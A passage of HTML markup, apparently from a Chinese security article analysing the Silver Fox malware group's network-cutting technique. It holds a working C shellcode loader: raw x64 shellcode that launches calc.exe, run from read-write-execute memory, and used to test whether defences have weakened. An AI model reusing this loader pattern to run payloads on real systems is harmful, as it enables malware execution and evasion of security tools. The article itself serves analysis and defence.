Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><o:page></o:page></p><p style=""><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">我们测试一下效果，（需要等一会儿）</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><img style="width:560.010009765625px;height:312.6899719238281px;" class="rich_pages wxw-img" data-ratio="0.5583596214511041" data-w="1902" src="https://wechat2rss.xlab.app/img-proxy/?k=57a5b5e8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XXaKiar62wd3QM9jibBaFM6VyyC9b6Fj1OI0Pv3kjMZ5DxLJb6xoLEcXibg%2F640%3Fwx_fmt%3Dpng"/></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">我们测试一下是否防御能力变弱：</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><img style="width:560.010009765625px;height:300.07000732421875px;" class="rich_pages wxw-img" data-ratio="0.5358306188925082" data-w="1228" src="https://wechat2rss.xlab.app/img-proxy/?k=7e37df04&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XXzUIxTMfAkz5DkialyXIj3ibxX1TicE3yHVicRagyFL4dvEK1dibiaUGiaZGTw%2F640%3Fwx_fmt%3Dpng"/></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">测试程序代码</span></span></span></p><p style="mso-style-name: &#39;Source Code&#39;;margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;word-break: break-all;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#include </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ImportTok&#39;;color: #008000;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><windows.h></windows.h></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#include </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DataTypeTok&#39;;color: #902000;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">unsigned</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DataTypeTok&#39;;color: #902000;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">char</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> buf</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">[]</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x20\x4c\x8b\x0e\x4d</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\x8b\x09\x4d\x8b\x49\x20\xeb\x63\x41\x8b\x49\x3c\x4d\x31\xff\x41\xb7\x88\x4d\x01</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\xcf\x49\x01\xcf\x45\x8b\x3f\x4d\x01\xcf\x41\x8b\x4f\x18\x45\x8b\x77\x20\x4d\x01</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\xce\xe3\x3f\xff\xc9\x48\x31\xf6\x41\x8b\x34\x8e\x4c\x01\xce\x48\x31\xc0\x48\x31</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\xd2\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x44\x39\xc2\x75\xda\x45</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\x8b\x57\x24\x4d\x01\xca\x41\x0f\xb7\x0c\x4a\x45\x8b\x5f\x1c\x4d\x01\xcb\x41\x8b</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\x04\x8b\x4c\x01\xc8\xc3\xc3\x41\xb8\x98\xfe\x8a\x0e\xe8\x92\xff\xff\xff\x48\x31</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\xc9\x51\x48\xb9\x63\x61\x6c\x63\x2e\x65\x78\x65\x51\x48\x8d\x0c\x24\x48\x31\xd2</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\x48\xff\xc2\x48\x83\xec\x28\xff\xd0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DataTypeTok&#39;;color: #902000;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">int</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> main</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">()</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DataTypeTok&#39;;color: #902000;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">void</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">*</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> exec </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> VirtualAlloc</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">nullptr, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">sizeof</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">buf</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">),</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> MEM_COMMIT </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">|</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> MEM_RESERVE, PAGE_EXECUTE_READWRITE</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(!</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 